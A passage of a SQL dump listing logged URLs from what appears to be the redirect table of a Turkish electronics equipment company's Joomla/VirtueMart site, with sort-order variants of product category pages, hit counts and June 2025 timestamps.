06:21:26','0000-00-00 00:00:00',301),(42182,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 06:21:28','0000-00-00 00:00:00',301),(42183,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:30','0000-00-00 00:00:00',301),(42184,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,category_name',NULL,'','',2,0,'2025-06-29 06:21:31','0000-00-00 00:00:00',301),(42185,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:33','0000-00-00 00:00:00',301),(42186,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,mf_name',NULL,'','',2,0,'2025-06-29 06:21:34','0000-00-00 00:00:00',301),(42187,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:36','0000-00-00 00:00:00',301),(42188,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,ordering',NULL,'','',2,0,'2025-06-29 06:21:38','0000-00-00 00:00:00',301),(42189,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 06:21:40','0000-00-00 00:00:00',301),(42190,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:41','0000-00-00 00:00:00',301),(42191,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,product_name',NULL,'','',2,0,'2025-06-29 06:21:43','0000-00-00 00:00:00',301),(42192,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:45','0000-00-00 00:00:00',301),(42193,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/by,product_sku',NULL,'','',2,0,'2025-06-29 06:21:47','0000-00-00 00:00:00',301),(42194,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/cs40-detail',NULL,'','',2,0,'2025-06-29 06:21:48','0000-00-00 00:00:00',301),(42195,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/cs40-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-29 06:21:50','0000-00-00 00:00:00',301),(42196,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/dirdesc',NULL,'','',2,0,'2025-06-29 06:21:52','0000-00-00 00:00:00',301),(42197,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/le-40v-detail',NULL,'','',2,0,'2025-06-29 06:21:54','0000-00-00 00:00:00',301),(42198,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/le-40v-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-29 06:21:55','0000-00-00 00:00:00',301),(42199,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/ls60v-detail',NULL,'','',2,0,'2025-06-29 06:21:57','0000-00-00 00:00:00',301),(42200,'http://3s-technologies.com.tr/tr/urunler/smd-d?????k-h??zl??/ls60v-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-29 06:21:59','0000-00-00 00:00:00',301),(42201,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n',NULL,'','',2,0,'2025-06-29 06:22:01','0000-00-00 00:00:00',301),(42202,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,`p`.product_sku',NULL,'','',2,0,'2025-06-29 06:22:02','0000-00-00 00:00:00',301),(42203,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',2,0,'2025-06-29 06:22:04','0000-00-00 00:00:00',301),(42204,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,category_name',NULL,'','',2,0,'2025-06-29 06:22:06','0000-00-00 00:00:00',301),(42205,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:22:08','0000-00-00 00:00:00',301),(42206,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,mf_name',NULL,'','',2,0,'2025-06-29 06:22:09','0000-00-00 00:00:00',301),(42207,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:22:11','0000-00-00 00:00:00',301),(42208,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,ordering',NULL,'','',2,0,'2025-06-29 06:22:13','0000-00-00 00:00:00',301),(42209,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',2,0,'2025-06-29 06:22:15','0000-00-00 00:00:00',301),(42210,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:22:17','0000-00-00 00:00:00',301),(42211,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,product_name',NULL,'','',2,0,'2025-06-29 06:22:18','0000-00-00 00:00:00',301),(42212,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,product_name/dirdesc',NULL,'','',2,0,'2025-06-29 06:22:20','0000-00-00 00:00:00',301),(42213,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/by,product_sku',NULL,'','',2,0,'2025-06-29 06:22:22','0000-00-00 00:00:00',301),(42214,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/dirdesc',NULL,'','',2,0,'2025-06-29 06:22:24','0000-00-00 00:00:00',301),(42215,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/gf-12-hc-ht-detail',NULL,'','',2,0,'2025-06-29 06:22:25','0000-00-00 00:00:00',301),(42216,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-29 06:22:27','0000-00-00 00:00:00',301),(42217,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/ly-8c-detail',NULL,'','',1,0,'2025-06-29 06:22:29','0000-00-00 00:00:00',301),(42218,'http://3s-technologies.com.tr/tr/urunler/smd-f?r??n/ly-8c-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 06:22:31','0000-00-00 00:00:00',301),(42219,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??',NULL,'','',1,0,'2025-06-29 06:22:33','0000-00-00 00:00:00',301),(42220,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/am100-detail',NULL,'','',1,0,'2025-06-29 06:22:34','0000-00-00 00:00:00',301),(42221,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/am100-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 06:22:36','0000-00-00 00:00:00',301),(42222,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 06:22:38','0000-00-00 00:00:00',301),(42223,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 06:22:39','0000-00-00 00:00:00',301),(42224,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,category_name',NULL,'','',1,0,'2025-06-29 06:22:41','0000-00-00 00:00:00',301),(42225,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:22:43','0000-00-00 00:00:00',301),(42226,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,mf_name',NULL,'','',1,0,'2025-06-29 06:22:45','0000-00-00 00:00:00',301),(42227,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:22:46','0000-00-00 00:00:00',301),(42228,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,ordering',NULL,'','',1,0,'2025-06-29 06:22:48','0000-00-00 00:00:00',301),(42229,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 06:22:50','0000-00-00 00:00:00',301),(42230,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:22:52','0000-00-00 00:00:00',301),(42231,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,product_name',NULL,'','',1,0,'2025-06-29 06:22:54','0000-00-00 00:00:00',301),(42232,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:22:55','0000-00-00 00:00:00',301),(42233,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/by,product_sku',NULL,'','',1,0,'2025-06-29 06:22:57','0000-00-00 00:00:00',301),(42234,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-29 06:22:59','0000-00-00 00:00:00',301),(42235,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/mx200lp-detail',NULL,'','',1,0,'2025-06-29 06:23:01','0000-00-00 00:00:00',301),(42236,'http://3s-technologies.com.tr/tr/urunler/smd-orta-h?zl??/mx200lp-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 06:23:03','0000-00-00 00:00:00',301),(42237,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z',NULL,'','',1,0,'2025-06-29 06:23:04','0000-00-00 00:00:00',301),(42238,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 06:23:06','0000-00-00 00:00:00',301),(42239,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 06:23:08','0000-00-00 00:00:00',301),(42240,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,category_name',NULL,'','',1,0,'2025-06-29 06:23:10','0000-00-00 00:00:00',301),(42241,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:23:12','0000-00-00 00:00:00',301),(42242,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,mf_name',NULL,'','',1,0,'2025-06-29 06:23:13','0000-00-00 00:00:00',301),(42243,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:23:15','0000-00-00 00:00:00',301),(42244,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,ordering',NULL,'','',1,0,'2025-06-29 06:23:17','0000-00-00 00:00:00',301),(42245,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 06:23:18','0000-00-00 00:00:00',301),(42246,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:23:20','0000-00-00 00:00:00',301),(42247,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,product_name',NULL,'','',1,0,'2025-06-29 06:23:22','0000-00-00 00:00:00',301),(42248,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 06:23:23','0000-00-00 00:00:00',301),(42249,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/by,product_sku',NULL,'','',1,0,'2025-06-29 06:23:25','0000-00-00 00:00:00',301),(42250,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/cm-602-l-detail',NULL,'','',1,0,'2025-06-29 06:23:27','0000-00-00 00:00:00',301),(42251,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/cm-602-l-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 06:23:29','0000-00-00 00:00:00',301),(42252,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/dirdesc',NULL,'','',1,0,'2025-06-29 06:23:30','0000-00-00 00:00:00',301),(42253,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/mx200lp-3-detail',NULL,'','',1,0,'2025-06-29 06:23:32','0000-00-00 00:00:00',301),(42254,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/mx200lp-3-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 06:23:34','0000-00-00 00:00:00',301),(42255,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/npm-detail',NULL,'','',1,0,'2025-06-29 06:23:36','0000-00-00 00:00:00',301),(42256,'http://3s-technologies.com.tr/tr/urunler/smd-ultra-h?z/npm-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 06:23:37','0000-00-00 00:00:00',301),(42257,'http://3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-kaz?ma-milling',NULL,'','',1,0,'2025-06-29 07:57:03','0000-00-00 00:00:00',301),(42258,'http://3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-y?kseklik-self-levelling',NULL,'','',1,0,'2025-06-29 07:57:10','0000-00-00 00:00:00',301),(42259,'http://www.3s-technologies.com.tr/en/ah?ap-i??leme-wood-processing-120cm',NULL,'','',1,0,'2025-06-29 07:58:25','0000-00-00 00:00:00',301),(42260,'http://www.3s-technologies.com.tr/en/akrilik-i?leme-acrylic-processing/akrilik-i??leme-acrylic-processing',NULL,'','',1,0,'2025-06-29 07:58:29','0000-00-00 00:00:00',301),(42261,'http://www.3s-technologies.com.tr/en/akrilik-i?leme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',1,0,'2025-06-29 07:58:32','0000-00-00 00:00:00',301),(42262,'http://www.3s-technologies.com.tr/en/aluminyum-i?leme-aluminum-processing/aluminyum-i??leme-aluminum-processing',NULL,'','',1,0,'2025-06-29 07:58:37','0000-00-00 00:00:00',301),(42263,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme',NULL,'','',1,0,'2025-06-29 08:01:47','0000-00-00 00:00:00',301),(42264,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 08:01:48','0000-00-00 00:00:00',301),(42265,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 08:01:50','0000-00-00 00:00:00',301),(42266,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:01:52','0000-00-00 00:00:00',301),(42267,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 08:01:54','0000-00-00 00:00:00',301),(42268,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,category_name',NULL,'','',1,0,'2025-06-29 08:01:56','0000-00-00 00:00:00',301),(42269,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:01:58','0000-00-00 00:00:00',301),(42270,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:01:59','0000-00-00 00:00:00',301),(42271,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:01','0000-00-00 00:00:00',301),(42272,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,mf_name',NULL,'','',1,0,'2025-06-29 08:02:03','0000-00-00 00:00:00',301),(42273,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:02:04','0000-00-00 00:00:00',301),(42274,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:06','0000-00-00 00:00:00',301),(42275,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:08','0000-00-00 00:00:00',301),(42276,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,ordering',NULL,'','',1,0,'2025-06-29 08:02:10','0000-00-00 00:00:00',301),(42277,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:11','0000-00-00 00:00:00',301),(42278,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 08:02:13','0000-00-00 00:00:00',301),(42279,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:02:15','0000-00-00 00:00:00',301),(42280,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:16','0000-00-00 00:00:00',301),(42281,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:18','0000-00-00 00:00:00',301),(42282,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_name',NULL,'','',1,0,'2025-06-29 08:02:20','0000-00-00 00:00:00',301),(42283,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:02:21','0000-00-00 00:00:00',301),(42284,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:23','0000-00-00 00:00:00',301),(42285,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:25','0000-00-00 00:00:00',301),(42286,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_sku',NULL,'','',1,0,'2025-06-29 08:02:27','0000-00-00 00:00:00',301),(42287,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:29','0000-00-00 00:00:00',301),(42288,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/dirdesc',NULL,'','',1,0,'2025-06-29 08:02:30','0000-00-00 00:00:00',301),(42289,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:32','0000-00-00 00:00:00',301),(42290,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/ess-310-24-detail',NULL,'','',1,0,'2025-06-29 08:02:34','0000-00-00 00:00:00',301),(42291,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 08:02:36','0000-00-00 00:00:00',301),(42292,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/ess-310-detail',NULL,'','',1,0,'2025-06-29 08:02:37','0000-00-00 00:00:00',301),(42293,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme/ess-310-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-29 08:02:39','0000-00-00 00:00:00',301),(42294,'http://www.3s-technologies.com.tr/en/products/b?lgesel-lehimleme?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:41','0000-00-00 00:00:00',301),(42295,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/???ubuk-lehim',NULL,'','',1,0,'2025-06-29 08:02:52','0000-00-00 00:00:00',301),(42296,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim',NULL,'','',1,0,'2025-06-29 08:02:53','0000-00-00 00:00:00',301),(42297,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 08:02:55','0000-00-00 00:00:00',301),(42298,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 08:02:57','0000-00-00 00:00:00',301),(42299,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:02:59','0000-00-00 00:00:00',301),(42300,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:01','0000-00-00 00:00:00',301),(42301,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name',NULL,'','',1,0,'2025-06-29 08:03:02','0000-00-00 00:00:00',301),(42302,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:03:04','0000-00-00 00:00:00',301),(42303,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:06','0000-00-00 00:00:00',301),(42304,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:07','0000-00-00 00:00:00',301),(42305,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name',NULL,'','',1,0,'2025-06-29 08:03:09','0000-00-00 00:00:00',301),(42306,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:03:11','0000-00-00 00:00:00',301),(42307,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:13','0000-00-00 00:00:00',301),(42308,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:15','0000-00-00 00:00:00',301),(42309,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,ordering',NULL,'','',1,0,'2025-06-29 08:03:17','0000-00-00 00:00:00',301),(42310,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:18','0000-00-00 00:00:00',301),(42311,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 08:03:20','0000-00-00 00:00:00',301),(42312,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:03:22','0000-00-00 00:00:00',301),(42313,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:24','0000-00-00 00:00:00',301),(42314,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:26','0000-00-00 00:00:00',301),(42315,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name',NULL,'','',1,0,'2025-06-29 08:03:27','0000-00-00 00:00:00',301),(42316,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:03:29','0000-00-00 00:00:00',301),(42317,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:31','0000-00-00 00:00:00',301),(42318,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:32','0000-00-00 00:00:00',301),(42319,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_sku',NULL,'','',1,0,'2025-06-29 08:03:34','0000-00-00 00:00:00',301),(42320,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:36','0000-00-00 00:00:00',301),(42321,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/dirdesc',NULL,'','',1,0,'2025-06-29 08:03:38','0000-00-00 00:00:00',301),(42322,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:40','0000-00-00 00:00:00',301),(42323,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?ubuk-lehim?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:41','0000-00-00 00:00:00',301),(42324,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n',NULL,'','',1,0,'2025-06-29 08:03:43','0000-00-00 00:00:00',301),(42325,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-29 08:03:45','0000-00-00 00:00:00',301),(42326,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-29 08:03:47','0000-00-00 00:00:00',301),(42327,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:48','0000-00-00 00:00:00',301),(42328,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:50','0000-00-00 00:00:00',301),(42329,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-29 08:03:52','0000-00-00 00:00:00',301),(42330,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:03:54','0000-00-00 00:00:00',301),(42331,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:55','0000-00-00 00:00:00',301),(42332,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:03:57','0000-00-00 00:00:00',301),(42333,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-29 08:03:59','0000-00-00 00:00:00',301),(42334,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:04:01','0000-00-00 00:00:00',301),(42335,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:04:02','0000-00-00 00:00:00',301),(42336,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-29 08:04:04','0000-00-00 00:00:00',301),(42337,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,ordering',NULL,'','',1,0,'2025-06-29 08:04:06','0000-00-00 00:00:00',301),(42338,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-29 08:04:08','0000-00-00 00:00:00',301),(42339,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-29 08:04:10','0000-00-00 00:00:00',301),(42340,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-29 08:04:11','0000-00-00 00:00:00',301),(42341,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-29 08:04:13','0000-00-00 